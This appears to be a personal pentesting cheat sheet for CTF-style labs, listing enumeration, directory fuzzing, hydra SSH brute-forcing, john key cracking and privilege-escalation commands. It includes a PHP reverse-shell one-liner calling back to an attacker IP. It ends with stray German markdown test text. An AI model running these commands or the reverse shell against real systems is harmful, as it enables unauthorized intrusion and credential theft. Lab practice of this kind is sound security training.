Scan for open ports
nmap -A 10.10.116.134
Get Information about samba
enum4linux -a 10.10.116.134
Connect to anonymous samba share
smbclient //10.10.116.134/Anonymous
Seclists: https://github.com/danielmiessler/SecLists
CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.
gobuster dir -u http://10.10.154.87:3333 -w /home/kali/Downloads/big.txt
wfuzz -c -z file,wordlist.txt -u http://10.10.218.20/api/site-log.php?date=FUZZ
wfuzz -c -z file,big.txt -d “username=FUZZ&password=FUZZ” -u http://shibes.xyz/api.php
wfuzz -c -z file,big.txt -u http://shibes.xyz/api.php?breed=FUZZ
./ffuf -u http://s3.bucket.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
dirb http://10.10.144.50 big.txt
SSH Brutefrce with hydra
hydra -t 4 -V -f -l jan -P /home/kali/Downloads/rockyou.txt 10.10.116.134 ssh
Crack ssh key: Convert id_rsa for john and the crack it with wordlist
python3 /usr/share/john/ssh2john.py id_rsa > idcrack
john --wordlist=rockyou.txt idcrack
Search in exploit db for wordpress
searchsploit wordpress
<?php $sock=fsockopen("10.9.231.55",4444);exec("/bin/sh -i <&3 >&3 2>&3"); ?>
nc -nvlp <port>
Upgrading from netcat with magic
LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix* hosts
List sudo rights
sudo -l
setuid-Bit
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
Bash History ~/bash_history ~/zsh_history
Local webserver from current directory
python3 -m http.server 8080
Pipe through grep and write resuls to file
cat <file> | grep -e "dir" > result.txt
View & edit Path variable
https://www.baeldung.com/linux/path-variable
echo $PATH
export PATH=/some/new/path:$PATH
Cyberchef - Encoding, Cryto and other string operations
exiftool - show exifdata
Extract hidden data from images
steghide extract -sf Image.jpg
kursiv
fett
durchgestrichen
code
Liste:
- Eintrag
- Noch einer
Liste:
- asdf
- asf
Quote